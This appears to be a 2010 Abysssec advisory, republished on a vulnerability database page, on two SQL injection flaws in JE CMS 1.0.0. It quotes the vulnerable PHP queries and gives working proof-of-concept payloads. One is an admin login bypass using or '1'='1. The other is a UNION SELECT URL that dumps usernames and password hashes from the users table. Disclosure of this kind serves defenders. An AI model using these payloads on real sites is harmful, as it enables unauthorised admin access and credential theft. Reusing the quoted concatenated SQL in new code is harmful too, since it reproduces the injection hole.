Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0

🗓️ 29 Sep 2010 00:00:00Reported by AbysssecType

packetstorm🔗 packetstormsecurity.com👁 15 Views

Month Of Abysssec Undisclosed Bugs - JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerabilit

`'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/  
'''  
  
  
Title : JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability  
Affected Version : JE CMS <= 1.0.0  
Vendor Site : joenasejes.cz.cc  
Discovery : abysssec.com  
  
  
Vulnerabilites :  
  
1. Bypass Authentication by SQL Injection Vulnerability  
  
in administrator\login.php page, lines 16-20:  
if (isset($_REQUEST['username'])) {  
$username = $_REQUEST['username'];  
$password = $_REQUEST['password'];  
$result = $core->userLogin();  
  
  
userLogin() function is in administrator\library\functions.php. in lines 129-139:  
if ($userName == '' || $password == '') {  
$errorMessage = JE_MISMATCH_USERNAME_PASSWORD;  
} else {  
// check the database and see if the username and password combo do match  
$sql = "SELECT userid  
FROM users  
WHERE username = '".$userName."' // vulnerability is here  
AND password = '".$this->getHash($password)."' // vulnerability is here  
AND usertype = 1  
AND block = 0";  
$result = $this->JEQuery($sql);  
  
POC:  
  
in administrator/login.php:  
  
username: admin' or '1'='1  
password: admin' or '1'='1  
  
2. SQL injection in administrator\index.php on "userid" parameter:  
  
in administrator\index.php file line 12:  
$userid = $_REQUEST['userid'];  
lines 52-53:  
case 'edituser' :  
$user = $core->getUser($userid);  
  
getUser function is in administrator\library\functions.php file. lines 578-583:  
  
function getUser($id){  
  
$sql = "SELECT *  
FROM users  
WHERE userid = ".$id; // vulnerability is here  
$result = $this->JEQuery($sql);  
  
POC:  
  
http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--  
  
`

29 Sep 2010 00:00Current

7.4High risk

Vulners AI Score7.4